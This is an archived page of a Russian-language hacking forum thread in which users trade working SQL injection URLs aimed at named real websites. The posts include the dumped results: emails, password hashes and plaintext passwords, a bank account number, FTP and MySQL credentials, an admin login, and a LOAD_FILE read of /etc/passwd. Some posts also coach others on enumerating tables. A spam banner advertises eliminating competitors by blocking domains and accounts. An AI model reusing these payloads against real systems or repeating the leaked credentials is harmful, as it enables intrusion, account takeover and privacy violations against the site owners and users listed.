УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
SQL Инъекции

Страница 734 из 1242

734

Опции темы

Поиск в этой теме

Опции просмотра

#7331

04.01.2009, 01:29

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Код:

http://irp.poltava.ua/news.php?news_id=8546[sql]

3-я ветка...
__________________________________________

"Журнал ДентАрт"

Код:

http://www.dentart.org/rubriki.php?rubr=-1+union+select+1,2,version(),4--

5.0.67-community

#7332

04.01.2009, 02:21

vladvk

Новичок

Регистрация: 22.12.2008

Сообщений: 16

Провел на форуме:
59223

Репутация: 7

synaptic.ru
Докрутил, но такого еще не видел, не стал разбираться что куда сувать надо:
Если кто будет раэбираться,потом пожалуйста отпишитесь
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),ba nk_name,char(58),email,char(58),char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+synaptic.users/*
::tapakaiiika@yandex.ru::620be1
40702810990010002180:САНКТ-ПЕТЕРБУРГСКИЙ Ф-Л АКБ "СОЮЗ" (ОАО):vsevolod.trofimov@synaptic.ru::uu876ujih9 8
:

lga160@rambler.ru::983016
::a_fedotov@pochta.ru::f7fb60
::metelev2007@mail.ru::584889
::rg.90@mail.ru::1d6b57
::evseevigor@mail.ru::34a06e
:

lefimova@gmail.com::436c69
::IVAN VESELOV@SYNAPTIC.RU::b0b906
::IVAN.VESELOV@SYNAPTIC.RU::cbfcdf
::honda-civic@list.ru::5188dc
::spawnok@spawnok.com::0ebf27
::sergey.g@freenet.de::4e1891

http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5, 6,7,8,9,10,11,12,13+from+psy.users/*
Всеволод Викторович Трофимов:vsev
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.users/*
seva:vsev
efaberge:eggs
jurist:140382
igorv112:qazwsxedc
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opini on_users/*
seva:vsevolod@artlinemedia.ru:ceb3e6
Всеволод:seva@artlinemedia.ru:282573
Сева:music@yandex.ru:c65cfa
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char( 58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+fr om+oxid.ftp_servers/*
mp3.int.ru:21:anonymous:doh@doh.doh
212.182.63.138:21:anonymous:doh@doh.doh
216.71.74.4:21:anonymous:doh@doh.doh
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.developers_app/*
oxid:vbiflt
oxid1:vsev
nitroamplifire:xiquliquitrux
winamp

maniw
leosoft:leoam
DJUSHMAN:andron
gf:gf
Yliya:01071986
Ylizka:01071986
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.autho r/*
Эстрина Инна:inch@molinos.ru:ghjtrn
РОФФ ТЕКНОЛОДЖИЗ:svetlana@roff.ru:techno
Агентство "Выше Радуги":esmi@uprainbow.ru:rainbow
Урюпин Д.А.:gebo@land.ru:kalendar
openmusic.ru

penmusic@openmusic.ru:rainbow
:info@kushnir.ru

roduction
:info@castlerock.ru:rok
Лебедева Елена:internet@kushnir.ru:kushnirint
Оксана и Егор:eglute@nm.ru:3214фф
Саванчук Катерина:marsinred@mail.ru:123фыв
Мария Карпеева:thedevoted@mail.ru:ghrtt
Евгения Карасева:ekarasyova@mail.ru:dsdw2
Елена Волосова:volosova@reakcia.ru:action
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,c har(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.u ser/*
:357a136b2575f97f:root :5be372e038520af0

xid localhost:4844f090239f56e0:wikiuser :499bd4ec632aac25:dmitr
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58 ),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/*
%:

xid %:test: %:test\_%: %:wikidb:wikiuser
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+malkov.users/*
email@email.ro: 2222:п
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+identification.users +limit+0,1/*
seva:vsev Larisa:gammy

#7333

04.01.2009, 02:25

vakula

Познающий

Регистрация: 20.01.2008

Сообщений: 44

Провел на форуме:
103485

Репутация: 4

Скажите плиз, как из ссылки которую дал R1dex вытянуть таблицу чтоб потом можна было позырить пасс?
Или киньте ссыль на какой нить фак по этой теме.
Всё обыскал...нет такого. Просто не пойму зачем нужен user и database толку с них?

#7334

04.01.2009, 02:28

vakula

Познающий

Регистрация: 20.01.2008

Сообщений: 44

Провел на форуме:
103485

Репутация: 4

Скажи плиз...где ты названия таблиц брал!! У меня уже крышу сносит! Помоги нубу

#7335

04.01.2009, 11:47

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

http://www.cohenhillel.org/about/profile.php?pid=-379+union+select+concat_ws(0x7c,user(),database(), version()),2,3/*

scully@localhost|scully|4.1.22

2vakula если правильно понял твой вопрос рой в сторону information_schema чтоб знать названия таблиц если версия 5.....) а user() и database() определенной ценности не несут) поможет только если ты имеешь доступ к mysql.user)

#7336

04.01.2009, 12:43

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

kino.com

Цитата:

http://www.kino.com/video/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database())--

USER kino@lma671.siteprotect.com
VERSION 4.0.12-standard
DATABASE kino

Google PR: 7

#7337

04.01.2009, 14:33

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

http://www.pangeaday.org/filmDetail.php?id=-72/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),data base()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--

Version:5.0.45-log
User:dr30628@192.168.1.131
Database

angea

PageRank = 7

http://www.gsi.ru/catalog.php?id=-72+union+select+1,2,3,concat_ws(0x3a3a,version(),u ser(),database()),5,6,7,8,9,10,11,12,13--

Version:4.0.24_Debian-10sarge2
User:root@localhost
Database:gsi

тИЦ = 800

http://mympeg.ru/video.htm?id=-72+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a ,version(),user(),database()),11,12,13,14,15--

Version:4.1.22-log
User:mympeg@localhost
Database:wwwmympeglggru

PageRank = 5

Последний раз редактировалось spherics; 04.01.2009 в 15:00..

#7338

04.01.2009, 15:43

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

bloggingheads.tv

Цитата:

http://bloggingheads.tv/video.php?id=-1+union+select+concat_ws(0x7c,user(),version(),dat abase())--

Обратите внимание на вывод! Возможно, кому то покажется, что принтабельных полей нет.. но, если присмотреться ..

VERSION: 5.0.45-log
USER brainwav@66.39.65.222
DATABASE brainwav_bhtvee

Логин и пасс админа: rw:exnihil0

Google PR: 7

Последний раз редактировалось Thrasher88; 04.01.2009 в 15:47..

#7339

04.01.2009, 16:29

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

http://www.usp.br/internacional/home.php?id_cont=12345674+union+select+1,2,3,4,5,c oncat_ws(0x3a3a,version(),user(),database()),7,8,9 ,10,11,12,13,14,15--&idioma=en

Database Version: 4.0.24_Debian-10sarge3-log
Database name: w3internacional
User name: w3internacional@localhost

PageRank = 8

http://www.skyalbum.com/showAlbum/222225368/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),data base()),8,9,10,11,12,13,14,15--

Version:5.0.22
User:skyalbum_db_user@localhost
Database:skyalbum

PageRank = 7

http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,(SEL ECT/**/CONCAT(User,0x7873716C696E6A64656C,Password)/**/FROM/**/mysql.user/**/LIMIT/**/8,1),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--

[1]:root:
[2]::
[3]::
[4]:vbulletin_user:6081047447093d5f
[5]:socu:7007c5b04ac32a70
[6]:skyalbum_db_user:5d651ca80db22e8a
[7]:skyalbum_user:17f2b11a7aaa0d14
[8]:skyalbum_db_user:5d651ca80db22e8a

Читаем /etc/passwd и так далее

http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,LOAD _FILE(0x2F6574632F706173737764),0x7873716C696E6A65 6E64),8,9,10,11,12,13,14,15--

http://www.specialradio.ru/p&d/?id=722222+union+select+1,2,3,4,concat_ws(0x3a3a,v ersion(),user(),database()),6,7,8,9,10--

Version:4.1.22
User:specialr_speci01@node1.hc.ru
Database:wwwspecialradior_specialradio

тИЦ = 1000
PageRank = 6

Последний раз редактировалось spherics; 04.01.2009 в 17:27..

#7340

04.01.2009, 20:04

..::TROYAN::..

Участник форума

Регистрация: 22.05.2008

Сообщений: 158

Провел на форуме:
2875309

Репутация: 348

Отправить сообщение для ..::TROYAN::.. с помощью ICQ

Код:

http://pointsonline.com/php/get_merchant_info.php?a=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3--

loyalty@localhost:4.1.22-standard-log:loyalty

Страница 734 из 1242

734

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход